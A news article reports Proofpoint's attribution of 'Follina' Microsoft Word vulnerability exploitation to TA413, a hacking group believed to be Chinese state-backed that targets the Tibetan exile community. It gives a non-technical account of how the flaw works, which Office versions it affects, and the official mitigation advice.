As per the threat analysis research from security firm Proofpoint, the role of Chinese government-backed hackers has been unearthed behind the Microsoft vulnerability exploitation.
According to the details shared by Proofpoint on Twitter, a hacking group labeled TA413 was using the vulnerability (dubbed as “Follina” by researchers) in malicious Word documents purportedly sent from the Central Tibetan Administration (the Tibetan government in exile based in Dharamsala, India). The TA413 hacking team is an APT, or “advanced persistent threat,” actor believed to be backed by the Chinese government and has a history of targeting the Tibetan exile community.
Chinese hackers have a reputation for exploiting software security breaches to target Tibetans. Tibetan political figures have been continuously under the attacks of Chinese spyware through Android browser exploits and malicious links sent via WhatsApp. The previous analysis of the Proofpoint has revealed that the browser extensions like the Firefox add-on have also been used as tools to snoop on Tibetan activists.
The Microsoft Word vulnerability first came to the fore on May 27th, when a security research group Nao Sec took to Twitter to discuss a sample submitted to the online malware scanning service VirusTotal. Nao Sec’s tweet identified the malicious code as being delivered through Microsoft Word documents, which were primarily used to execute PowerShell commands, a powerful system administration tool for Windows.
Researcher Kevin Beaumont’s analysis revealed that the vulnerability allowed a maliciously crafted Word document to load HTML files from a remote server and then execute commands through PowerShell by hacking the Microsoft Support Diagnostic Tool (MSDT), a program that usually collects data about crashes and other problems with Microsoft applications.
Microsoft has acknowledged the vulnerability, and it further reported that the hacker could install programs, modify, access, or delete data, and even create new user accounts on a compromised system. Additionally, the worldwide use of Microsoft Office has given rise to speculations that the potential cyberattack surface for the vulnerability may be large. The recent analysis suggests that the vulnerability ‘Follina’ affects Office 2013, 2016, 2019, 2021, Office ProPlus, and Office 365. However, the Infrastructure Security Agencyc and the US Cybersecurity have urged system administrators to implement Microsoft’s guidance to mitigate exploitation.